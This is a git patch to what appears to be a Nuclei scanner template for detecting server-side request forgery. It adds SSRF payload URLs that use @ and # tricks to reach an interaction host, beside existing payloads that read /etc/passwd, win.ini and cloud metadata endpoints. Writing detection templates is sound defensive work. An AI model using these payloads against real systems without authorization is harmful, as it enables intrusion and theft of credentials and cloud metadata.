From 2cba2ac444890268ccc6d99030a5ccdde29e8289 Mon Sep 17 00:00:00 2001
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Date: Mon, 22 Jul 2024 16:19:11 +0330
Subject: [PATCH] Update response-ssrf.yaml

---
 dast/vulnerabilities/ssrf/response-ssrf.yaml | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml
index 1b6ab7b830..c2c4fc7e4c 100644
--- a/dast/vulnerabilities/ssrf/response-ssrf.yaml
+++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml
@@ -2,7 +2,7 @@ id: response-ssrf
 
 info:
   name: Full Response SSRF Detection
-  author: pdteam,pwnhxl,j4vaovo
+  author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi
   severity: high
   reference:
     - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
@@ -20,7 +20,11 @@ http:
       ssrf:
         - 'http://{{interactsh-url}}'
         - 'http://{{FQDN}}.{{interactsh-url}}'
+        - 'http://{{FQDN}}@{{interactsh-url}}'
+        - 'http://{{interactsh-url}}#{{FQDN}}'
         - 'http://{{RDN}}.{{interactsh-url}}'
+        - 'http://{{RDN}}@{{interactsh-url}}'
+        - 'http://{{interactsh-url}}#{{RDN}}'
         - 'file:////./etc/./passwd'
         - 'file:///c:/./windows/./win.ini'
         - 'http://metadata.tencentyun.com/latest/meta-data/'
@@ -128,4 +132,4 @@ http:
         part: body
         regex:
           - 'id[\s\S]+interfaces\/'
-# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950